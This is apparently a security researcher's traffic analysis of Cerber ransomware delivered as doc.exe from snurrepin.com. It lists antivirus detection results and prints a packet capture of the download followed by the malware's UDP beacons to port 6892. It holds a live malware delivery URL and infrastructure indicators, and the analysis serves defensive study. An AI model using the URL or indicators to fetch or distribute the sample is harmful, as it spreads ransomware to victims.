Snurrepin.com Delivers doc.exe CERBER Ransomware Malware PCAP File Download Traffic Analysis

SHA256: 69e6f40fa4231edb47d52b5a19de15720b3e5fc19f68bb3060e9b6e06c307d42
File name: doc.exe
Detection ratio: 9 / 56
Analysis date: 2016-11-26 23:56:21 UTC ( 0 minutes ago )
CrowdStrike Falcon (ML) malicious_confidence_75% (W) 20161024
ESET-NOD32 NSIS/Injector.KT 20161126
Invincea virus.win32.sality.at 20161018
Kaspersky UDS:DangerousObject.Multi.Generic 20161127
McAfee Artemis!4D4D6D2C7CC6 20161127
McAfee-GW-Edition BehavesLike.Win32.Downloader.dc 20161126
Qihoo-360 HEUR/QVM42.0.0000.Malware.Gen 20161127
Rising Malware.FakePDF@CV!1.6AC1-LyO8PTdeqgK (cloud) 20161126
Symantec Ransom.Cerber 20161127

2016-11-26 17:05:51.661059 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [P.], seq 0:392, ack 1, win 256, length 392: HTTP: GET /doc.exe HTTP/1.1
E…..@….Y…fY!…@.PQf-.DC..P…”S..GET /doc.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=214078-
Unless-Modified-Since: Sat, 26 Nov 2016 19:38:19 GMT
If-Range: “46448-54239617f5e88″
Host: snurrepin.com
Connection: Keep-Alive

2016-11-26 17:06:03.817526 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [.], ack 555, win 256, length 0
E..(y.@….j…f.m.1.L..r.MT…xP………….
2016-11-26 17:06:06.750700 IP 192.168.1.102.50494 > 208.109.4.49.443: Flags [F.], seq 1829, ack 4858, win 257, length 0
E..(y.@….i…f.m.1.>…..Q../SP………….
2016-11-26 17:06:06.750911 IP 192.168.1.102.50483 > 208.109.4.218.80: Flags [F.], seq 274, ack 669, win 256, length 0
E..(.V@…D$…f.m…3.P…-.}..P………….
2016-11-26 17:06:06.751057 IP 192.168.1.102.50486 > 23.64.73.112.443: Flags [F.], seq 2487, ack 225525, win 256, length 0
E..(.a@……..f.@Ip.6…J.F….P………….
2016-11-26 17:06:06.751180 IP 192.168.1.102.50493 > 23.64.73.112.443: Flags [F.], seq 1584, ack 172165, win 256, length 0
E..(.b@……..f.@Ip.=..^.g..S..P…NF……..
2016-11-26 17:06:06.752556 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [F.], seq 392, ack 74057, win 256, length 0
E..(..@……..fY!…@.PQf/`DD./P…L………
2016-11-26 17:06:06.752624 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [F.], seq 878, ack 555, win 256, length 0
E..(y.@….g…f.m.1.L..r.MT…xP………….
2016-11-26 17:06:06.752691 IP 192.168.1.102.50492 > 23.64.73.112.443: Flags [F.], seq 1882, ack 75023, win 256, length 0
E..(.c@……..f.@Ip.<……….P….-……..
2016-11-26 17:06:06.752880 IP 192.168.1.102.50487 > 23.64.73.112.443: Flags [F.], seq 2817, ack 394566, win 695, length 0
E..(.d@……..f.@Ip.7..B…….P…Y………
2016-11-26 17:06:06.784774 IP 192.168.1.102.50486 > 23.64.73.112.443: Flags [R.], seq 2488, ack 225554, win 0, length 0
E..(.e@……..f.@Ip.6…J.G….P………….
2016-11-26 17:06:06.785440 IP 192.168.1.102.50492 > 23.64.73.112.443: Flags [R.], seq 1883, ack 75052, win 0, length 0
E..(.f@……..f.@Ip.<……….P………….
2016-11-26 17:06:06.793362 IP 192.168.1.102.50487 > 23.64.73.112.443: Flags [R.], seq 2818, ack 394595, win 0, length 0
E..(.g@……..f.@Ip.7..B……2P…\K……..
2016-11-26 17:06:06.793768 IP 192.168.1.102.50493 > 23.64.73.112.443: Flags [R.], seq 1585, ack 172194, win 0, length 0
E..(.h@……..f.@Ip.=..^.g..S..P…O%……..
2016-11-26 17:06:06.833382 IP 192.168.1.102.50494 > 208.109.4.49.443: Flags [.], ack 4859, win 257, length 0
E..(y.@….f…f.m.1.>…..R../TP………….
2016-11-26 17:06:06.838734 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [.], ack 556, win 256, length 0
E..(y.@….e…f.m.1.L..r.MU…yP………….
2016-11-26 17:06:06.839238 IP 192.168.1.102.50483 > 208.109.4.218.80: Flags [.], ack 670, win 256, length 0
E..(.Z@…D …f.m…3.P…..}..P………….
2016-11-26 17:06:06.991510 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [.], ack 74058, win 256, length 0
E..(..@……..fY!…@.PQf/aDD.0P…L………
2016-11-26 17:06:12.808611 IP 192.168.1.102.56893 > 192.168.0.0.6892: UDP, length 10
E..&B…..v….f…..=….CYhi008e906a……..
2016-11-26 17:06:12.808689 IP 192.168.1.102.56893 > 192.168.0.1.6892: UDP, length 10
E..&>…..z….f…..=….CXhi008e906a……..
2016-11-26 17:06:12.808695 IP 192.168.1.102.56893 > 192.168.0.2.6892: UDP, length 10
E..&…….f…f…..=….CWhi008e906a……..
2016-11-26 17:06:12.808741 IP 192.168.1.102.56893 > 192.168.0.3.6892: UDP, length 10
E..&|{….<….f…..=….CVhi008e906a……..
2016-11-26 17:06:12.808826 IP 192.168.1.102.56893 > 192.168.0.4.6892: UDP, length 10
E..&e…..Sw…f…..=….CUhi008e906a……..
2016-11-26 17:06:12.808832 IP 192.168.1.102.56893 > 192.168.0.5.6892: UDP, length 10
E..&a…..W….f…..=….CThi008e906a……..
2016-11-26 17:06:12.808878 IP 192.168.1.102.56893 > 192.168.0.6.6892: UDP, length 10
E..&’……j…f…..=….CShi008e906a……..
2016-11-26 17:06:12.808961 IP 192.168.1.102.56893 > 192.168.0.7.6892: UDP, length 10

2016-11-26 17:06:12.810660 IP 192.168.1.102.56893 > 194.165.16.13.6892: UDP, length 10
E..&    B………f…..=….1Ohi008e906a……..
2016-11-26 17:06:12.810755 IP 192.168.1.102.56893 > 194.165.16.14.6892: UDP, length 10
E..&C,….c….f…..=….1Nhi008e906a……..
2016-11-26 17:06:12.810761 IP 192.168.1.102.56893 > 194.165.16.15.6892: UDP, length 10
E..&O;….W….f…..=….1Mhi008e906a……..
2016-11-26 17:06:12.810837 IP 192.168.1.102.56893 > 194.165.16.16.6892: UDP, length 10
E..&o^….7….f…..=….1Lhi008e906a……..
2016-11-26 17:06:12.810842 IP 192.168.1.102.56893 > 194.165.16.17.6892: UDP, length 10
E..&c…..Cu…f…..=….1Khi008e906a……..
2016-11-26 17:06:12.810887 IP 192.168.1.102.56893 > 194.165.16.18.6892: UDP, length 10
E..&)i….}….f…..=….1Jhi008e906a……..
2016-11-26 17:06:12.810972 IP 192.168.1.102.56893 > 194.165.16.19.6892: UDP, length 10
E..&%x………f…..=….1Ihi008e906a……..
2016-11-26 17:06:12.811021 IP 192.168.1.102.56893 > 194.165.16.20.6892: UDP, length 10
E..&.V………f…..=….1Hhi008e906a……..
2016-11-26 17:06:12.811026 IP 192.168.1.102.56893 > 194.165.16.21.6892: UDP, length 10
E..&…….y…f…..=….1Ghi008e906a……..
2016-11-26 17:06:12.811078 IP 192.168.1.102.56893 > 194.165.16.22.6892: UDP, length 10
E..&Jq….\….f…..=….1Fhi008e906a……..
2016-11-26 17:06:12.811153 IP 192.168.1.102.56893 > 194.165.16.23.6892: UDP, length 10
E..&F…..`|…f…..=….1Ehi008e906a……..
2016-11-26 17:06:12.811158 IP 192.168.1.102.56893 > 194.165.16.24.6892: UDP, length 10
E..&………..f…..=….1Dhi008e906a……..
2016-11-26 17:06:12.811203 IP 192.168.1.102.56893 > 194.165.16.25.6892: UDP, length 10
E..&………..f…..=….1Chi008e906a……..
2016-11-26 17:06:12.811273 IP 192.168.1.102.56893 > 194.165.16.26.6892: UDP, length 10
E..&X…..N….f…..=….1Bhi008e906a……..
2016-11-26 17:06:12.811330 IP 192.168.1.102.56893 > 194.165.16.27.6892: UDP, length 10
E..&T…..Q….f…..=….1Ahi008e906a……..
2016-11-26 17:06:12.811380 IP 192.168.1.102.56893 > 194.165.16.28.6892: UDP, length 10
E..&}…..)….f…..=….1@hi008e906a……..
2016-11-26 17:06:12.811385 IP 192.168.1.102.56893 > 194.165.16.29.6892: UDP, length 10
E..&r…..4….f…..=….1?hi008e906a……..
2016-11-26 17:06:12.811438 IP 192.168.1.102.56893 > 194.165.16.30.6892: UDP, length 10
E..&;…..j….f…..=….1>hi008e906a……..
2016-11-26 17:06:12.811511 IP 192.168.1.102.56893 > 194.165.16.31.6892: UDP, length 10
E..&8…..n….f…..=….1=hi008e906a……..
2016-11-26 17:06:12.811516 IP 192.168.1.102.56893 > 194.165.16.32.6892: UDP, length 10
E..&l…..:….f… .=….1<hi008e906a……..
2016-11-26 17:06:12.811563 IP 192.168.1.102.56893 > 194.165.16.33.6892: UDP, length 10
E..&g…..>….f…!.=….1;hi008e906a……..
2016-11-26 17:06:12.811645 IP 192.168.1.102.56893 > 194.165.16.34.6892: UDP, length 10
E..&……x….f…”.=….1:hi008e906a……..
2016-11-26 17:06:12.811650 IP 192.168.1.102.56893 > 194.165.16.35.6892: UDP, length 10
E..&!……….f…#.=….19hi008e906a……..
2016-11-26 17:06:12.811698 IP 192.168.1.102.56893 > 194.165.16.36.6892: UDP, length 10
E..&    ……….f…$.=….18hi008e906a……..
2016-11-26 17:06:12.811779 IP 192.168.1.102.56893 > 194.165.16.37.6892: UDP, length 10
: